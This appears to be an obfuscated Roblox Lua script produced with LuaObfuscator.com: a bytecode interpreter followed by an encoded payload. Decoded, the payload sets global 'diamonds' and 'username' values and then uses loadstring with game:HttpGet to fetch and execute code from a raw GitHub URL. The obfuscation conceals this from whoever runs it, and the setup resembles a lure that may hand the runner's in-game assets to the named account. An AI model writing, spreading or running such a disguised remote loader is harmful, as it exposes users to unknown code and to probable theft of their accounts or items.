--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v101=v5(v71,v19);v19=nil;return v101;else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=(877 -(282 + 595)) -(1637 -(1523 + 114)) ;local v73;while true do if (v72==(0 -(0 + 0))) then v73=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -((523 -156) + 201)))) ;return v73-(v73%(928 -(214 + (1778 -(68 + 997))))) ;end end else local v74=2^(v32-(1 + 0)) ;return (((v31%(v74 + v74))>=v74) and 1) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1270 -(226 + 1044) ;local v36;local v37;while true do if (v35==(4 -3)) then return (v37 * ((553 -(67 + 113)) -(32 + 85))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 ;v35=1 + 0 + 0 ;end end end local function v23()local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * 16777216) + (v41 * (35084 + 13115 + 17337)) + (v40 * ((2014 -(915 + 82)) -761)) + v39 ;end if (v38==(952 -(802 + 150))) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (10 -6) ;v38=1 -0 ;end end end local function v24()local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1 + 0 ,26 -6 ) * (2^(1219 -(1069 + 118)))) + v43 ;local v47=v20(v44,47 -(1106 -(1020 + 60)) ,1454 -(630 + 793) );local v48=((v20(v44,69 -37 )==(1 + (0 -0))) and  -(1 -0)) or (1 + 0) ;if (v47==(791 -(368 + 423))) then if (v46==0) then return v48 * (1138 -((549 -433) + 1022)) ;else local v80=(0 + 0) -(0 -0) ;while true do if (v80==(18 -(10 + 8))) then v47=3 -2 ;v45=0 -0 ;break;end end end elseif (v47==((4653 -(760 + 987)) -(814 + 45))) then return ((v46==(0 -(1913 -(1789 + 124)))) and (v48 * ((443 -(416 + 26))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((1 + 1)^(91 -39)))) ;end local function v25(v49)local v50;if  not v49 then local v75=766 -(745 + 1 + 20) ;while true do if (v75==(0 + 0 + 0)) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;local v51={};for v68=(1058 -(87 + 968)) -2 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((1581 -(1183 + 397))==v52) then v55=nil;v56=nil;v52=2 + 0 ;end if (v52~=(404 -(108 + 294))) then else v57=nil;v58=nil;v52=8 -5 ;end if (v52~=(1492 -(570 + 919))) then else local v76=0;while true do if (v76==(0 -0)) then v59=nil;v60=nil;v76=1;end if (v76==(1976 -(1913 + 62))) then v52=3 + 1 ;break;end end end if (v52~=0) then else v53=811 -(569 + 242) ;v54=nil;v52=2 -1 ;end if (v52~=(1 + 3)) then else while true do if ((7 -5)==v53) then v58=nil;v59=nil;v53=3;end if (v53==(1027 -(706 + 318))) then v60=nil;while true do local v102=1251 -(721 + 530) ;while true do if (v102~=(1271 -(945 + 326))) then else local v109=0 -0 ;while true do if (v109~=(1 + 0)) then else v102=701 -(271 + 429) ;break;end if (v109==(0 + 0)) then if (v54==(1502 -(1408 + 92))) then local v117=304 -(244 + 60) ;local v118;while true do if (v117==0) then v118=0;while true do local v178=0;local v179;while true do if (v178==(1086 -(461 + 625))) then v179=1288 -(993 + 295) ;while true do if (v179~=(0 + 0)) then else if (v118~=(1171 -(418 + 753))) then else local v194=476 -(41 + 435) ;while true do if (v194~=(0 + 0)) then else for v195=1 + 0 ,v23() do local v196=1125 -(936 + 189) ;local v197;local v198;while true do if ((1 + 0)~=v196) then else while true do if (v197==(1613 -(1565 + 48))) then v198=v21();if (v20(v198,1 + 0 ,1 + 0 )~=(529 -(406 + 123))) then else local v207=1769 -(1749 + 20) ;local v208;local v209;local v210;while true do if (v207==(1 + 0)) then v210={v22(),v22(),nil,nil};if (v208==0) then local v214=0 -0 ;local v215;local v216;while true do if (v214~=1) then else while true do if (v215==(0 -0)) then v216=0;while true do if (v216~=(1092 -(975 + 117))) then else v210[1878 -(157 + 1718) ]=v22();v210[4]=v22();break;end end break;end end break;end if ((0 + 0)==v214) then v215=0 + 0 ;v216=nil;v214=1;end end elseif (v208==(3 -2)) then v210[10 -7 ]=v23();elseif (v208==(1147 -(466 + 679))) then v210[6 -3 ]=v23() -((5 -3)^16) ;elseif (v208==(5 -2)) then local v226=0 -0 ;local v227;while true do if (v226==(0 -0)) then v227=0 + 0 ;while true do if (v227==0) then v210[3]=v23() -(2^(1916 -(106 + 1794))) ;v210[6 -2 ]=v22();break;end end break;end end end v207=1 + 1 ;end if (v207==(1 + 1)) then if (v20(v209,2 -1 ,1)~=1) then else v210[5 -3 ]=v60[v210[5 -3 ]];end if (v20(v209,116 -(4 + 110) ,2)==1) then v210[587 -(57 + 527) ]=v60[v210[1192 -(449 + 740) ]];end v207=1430 -(41 + 1386) ;end if (v207==(106 -(17 + 86))) then if (v20(v209,3,3 + 0 )==1) then v210[951 -(245 + 702) ]=v60[v210[8 -4 ]];end v55[v195]=v210;break;end if ((0 -0)==v207) then v208=v20(v198,5 -3 ,169 -(122 + 44) );v209=v20(v198,4,2 + 4 );v207=1 -0 ;end end end break;end end break;end if (v196~=0) then else v197=0 -0 ;v198=nil;v196=1;end end end for v199=441 -(382 + 58) ,v23() do v56[v199-(3 -2) ]=v28();end v194=1 + 0 ;end if (v194==(1 + 0)) then v118=1;break;end end end if (v118==(1 + 0)) then return v58;end break;end end break;end end end break;end end end if (v54==0) then local v119=0 -0 ;local v120;local v121;while true do if ((0 -0)==v119) then v120=65 -(30 + 35) ;v121=nil;v119=2 -1 ;end if (v119==(1 + 0)) then while true do if (v120==(1257 -(1043 + 214))) then v121=0 -0 ;while true do if (v121==2) then v54=1691 -(1121 + 569) ;break;end if (v121~=0) then else local v185=1212 -(323 + 889) ;while true do if ((214 -(22 + 192))==v185) then v55={};v56={};v185=2 -1 ;end if (v185~=(684 -(483 + 200))) then else v121=1464 -(1404 + 59) ;break;end end end if (v121~=(581 -(361 + 219))) then else local v186=0 -0 ;while true do if (v186==(1 -0)) then v121=322 -(53 + 267) ;break;end if (v186~=(0 + 0)) then else v57={};v58={v55,v56,nil,v57};v186=1 + 0 ;end end end end break;end end break;end end end v109=1 + 0 ;end end end if ((1 + 0)~=v102) then else if ((851 -(20 + 830))~=v54) then else local v110=0 + 0 ;local v111;while true do if (v110~=0) then else v111=126 -(116 + 10) ;while true do if (v111==(0 + 0)) then v59=v23();v60={};v111=1;end if (v111==(739 -(542 + 196))) then local v167=0 + 0 ;while true do if (v167~=(1 -0)) then else v111=1 + 1 ;break;end if (v167==0) then local v184=0 + 0 ;while true do if (v184~=1) then else v167=1 + 0 ;break;end if (v184~=(0 + 0)) then else for v188=1 -0 ,v59 do local v189=765 -(574 + 191) ;local v190;local v191;local v192;local v193;while true do if (v189==(0 + 0)) then v190=0 -0 ;v191=nil;v189=2 -1 ;end if (v189==(1553 -(1126 + 425))) then while true do if ((405 -(118 + 287))==v190) then local v201=0;local v202;while true do if (v201==(0 -0)) then v202=0 -0 ;while true do if ((1122 -(118 + 1003))~=v202) then else v190=850 -(254 + 595) ;break;end if (v202==0) then v191=0;v192=nil;v202=127 -(55 + 71) ;end end break;end end end if (v190~=(2 -1)) then else v193=nil;while true do if (v191~=(378 -(142 + 235))) then else if (v192==(1 -0)) then v193=v21()~=(0 -0) ;elseif (v192==(1 + 1)) then v193=v24();elseif (v192~=(980 -(553 + 424))) then else v193=v25();end v60[v188]=v193;break;end if (0==v191) then local v204=0 -0 ;local v205;local v206;while true do if (v204==(1 -0)) then while true do if (v205==(0 + 0)) then v206=0;while true do if (v206==1) then v191=1 + 0 ;break;end if ((0 + 0)==v206) then local v212=0 + 0 ;local v213;while true do if (v212==(0 + 0)) then v213=0 -0 ;while true do if (v213~=(0 -0)) then else local v225=0 -0 ;while true do if ((1 + 0)==v225) then v213=2 -1 ;break;end if (v225~=(0 + 0)) then else v192=v21();v193=nil;v225=807 -(118 + 688) ;end end end if ((4 -3)==v213) then v206=754 -(239 + 514) ;break;end end break;end end end end break;end end break;end if (v204==0) then v205=0 + 0 ;v206=nil;v204=1 + 0 ;end end end end break;end end break;end if (v189~=(1330 -(797 + 532))) then else v192=nil;v193=nil;v189=2 + 0 ;end end end v58[2 + 1 ]=v21();v184=2 -1 ;end end end end end if (v111==2) then v54=1204 -(373 + 829) ;break;end end break;end end end break;end end end break;end if ((731 -(476 + 255))==v53) then local v97=1130 -(369 + 761) ;local v98;while true do if (v97~=(0 + 0)) then else v98=97 -(11 + 86) ;while true do if (v98==(2 -1)) then v53=1 -0 ;break;end if (v98==0) then local v112=0 -0 ;while true do if ((0 -0)~=v112) then else v54=238 -(64 + 174) ;v55=nil;v112=1 + 0 ;end if (v112==(1 -0)) then v98=1;break;end end end end break;end end end if (v53==1) then local v99=336 -(144 + 192) ;local v100;while true do if (v99~=(0 -0)) then else v100=216 -(42 + 174) ;while true do if (0==v100) then local v113=0 + 0 ;while true do if (v113==(1061 -(810 + 251))) then v56=nil;v57=nil;v113=1 + 0 ;end if (v113==(1 + 0)) then v100=1 + 0 ;break;end end end if (v100~=(1 + 0)) then else v53=1506 -(363 + 1141) ;break;end end break;end end end end break;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v81=v65;local v82=v66;local v83=v67;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==0) then v93=v81[v85];v94=v93[1];v96=1;end if (v96==1) then if (v94<=6) then if (v94<=2) then if (v94<=0) then v91[v93[2]]();elseif (v94==1) then for v157=v93[2],v93[3] do v91[v157]=nil;end else local v122=v93[2];v91[v122]=v91[v122]();end elseif (v94<=4) then if (v94==3) then local v124;local v125,v126;local v127;local v128;if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v63;else v91[v93[2]]=v63[v93[3]];end v85=v85 + 1 ;v93=v81[v85];v128=v93[2];v127=v91[v93[3]];v91[v128 + 1 ]=v127;v91[v128]=v127[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v128=v93[2];v125,v126=v84(v91[v128](v13(v91,v128 + 1 ,v93[3])));v86=(v126 + v128) -1 ;v124=0;for v159=v128,v86 do v124=v124 + 1 ;v91[v159]=v125[v124];end v85=v85 + 1 ;v93=v81[v85];v128=v93[2];v91[v128]=v91[v128](v13(v91,v128 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v85=v93[3];elseif ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v63;else v91[v93[2]]=v63[v93[3]];end elseif (v94==5) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v85=v93[3];end elseif (v94<=9) then if (v94<=7) then local v114=0;local v115;local v116;while true do if (v114==1) then v91[v115 + 1 ]=v116;v91[v115]=v116[v93[4]];break;end if (v114==0) then v115=v93[2];v116=v91[v93[3]];v114=1;end end elseif (v94==8) then local v138=0;local v139;local v140;local v141;local v142;while true do if (v138==1) then v86=(v141 + v139) -1 ;v142=0;v138=2;end if (v138==2) then for v181=v139,v86 do v142=v142 + 1 ;v91[v181]=v140[v142];end break;end if (v138==0) then v139=v93[2];v140,v141=v84(v91[v139](v13(v91,v139 + 1 ,v93[3])));v138=1;end end else do return;end end elseif (v94<=11) then if (v94>10) then v91[v93[2]]=v93[3];else local v145;v145=v93[2];v91[v145]=v91[v145]();v85=v85 + 1 ;v93=v81[v85];v91[v93[2]][v93[3]]=v93[4];v85=v85 + 1 ;v93=v81[v85];if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v63;else v91[v93[2]]=v63[v93[3]];end v85=v85 + 1 ;v93=v81[v85];v145=v93[2];v91[v145]=v91[v145]();v85=v85 + 1 ;v93=v81[v85];v91[v93[2]][v93[3]]=v93[4];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];end elseif (v94==12) then v91[v93[2]][v93[3]]=v93[4];else local v155=v93[2];v91[v155]=v91[v155](v13(v91,v155 + 1 ,v86));end v85=v85 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403533O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F706970697069706970696132332F64617A6F7368646E6177627672627473796875646A696B776173642F6D61696E2F313603073O0067657467656E7603083O006469616D6F6E6473024O0080842E4103083O00757365726E616D65030B3O004868616F636F6C6F72323000243O00120B3O00014O0001000100013O0026053O0002000100010004063O0002000100120B000100013O0026050001000F000100020004063O000F0001001204000200033O001203000300043O00202O00030003000500122O000500066O000300056O00023O00024O00020001000100044O0023000100260500010005000100010004063O0005000100120B000200013O0026050002001B000100010004063O001B0001001204000300074O000A00030001000200302O00030008000900122O000300076O00030001000200302O0003000A000B00122O000200023O00260500020012000100020004063O0012000100120B000100023O0004063O000500010004063O001200010004063O000500010004063O002300010004063O000200012O00093O00017O00",v9(),...);
